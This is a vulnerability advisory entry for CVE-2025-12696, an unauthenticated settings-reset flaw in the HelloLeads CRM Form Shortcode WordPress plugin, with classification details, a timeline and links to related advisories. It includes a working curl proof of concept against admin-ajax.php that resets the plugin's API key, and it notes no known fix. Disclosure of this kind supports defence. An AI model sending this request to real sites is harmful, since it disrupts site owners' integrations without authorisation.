HelloLeads CRM Form Shortcode <= 1.0 – Unauthenticated Settings Reset | CVE 2025-12696

Description

The plugin does not have authorisation and CSRF check when resetting its settings, allowing unauthenticated users to reset them

Proof of Concept

Configure the plugin with an API key.

Run:

```
curl -s -X POST \
  "http://example.com/wp-admin/admin-ajax.php" \
  -d "action=hls_crmf_reset_crm_config" \
  -d "token=reset"
```

Observe that API key is reset.

Affects Plugins

hls-crm-form-shortcode

No known fix

References

CVE

CVE-2025-12696

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

CVSS

5.3 (medium)

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/Nxploited

Verified

Yes

WPVDB ID

e552dfc8-c6e1-4605-bc36-30dc4066eaea

Timeline

Publicly Published

2025-11-22 (about 1 month ago)

Added

2025-11-15 (about 1 month ago)

Last Updated

2025-11-15 (about 1 month ago)

Other

Published

Title

Published

2024-07-23

Title

Social Auto Poster < 5.3.15 - Missing Authorization via Multiple Functions

Published

2025-05-16

Title

ProfileGrid < 5.9.5.2 - Missing Authorization

Published

2024-12-11

Title

Quietly Insights <= 1.2.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update

Published

2025-05-23

Title

JobHunt Job Alerts <= 3.6 - Missing Authorization to Unauthenticated Arbitrary Content Deletion

Published

2025-12-18

Title

myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Program < 2.9.7.2 - Missing Authorization to Sensitive Information Exposure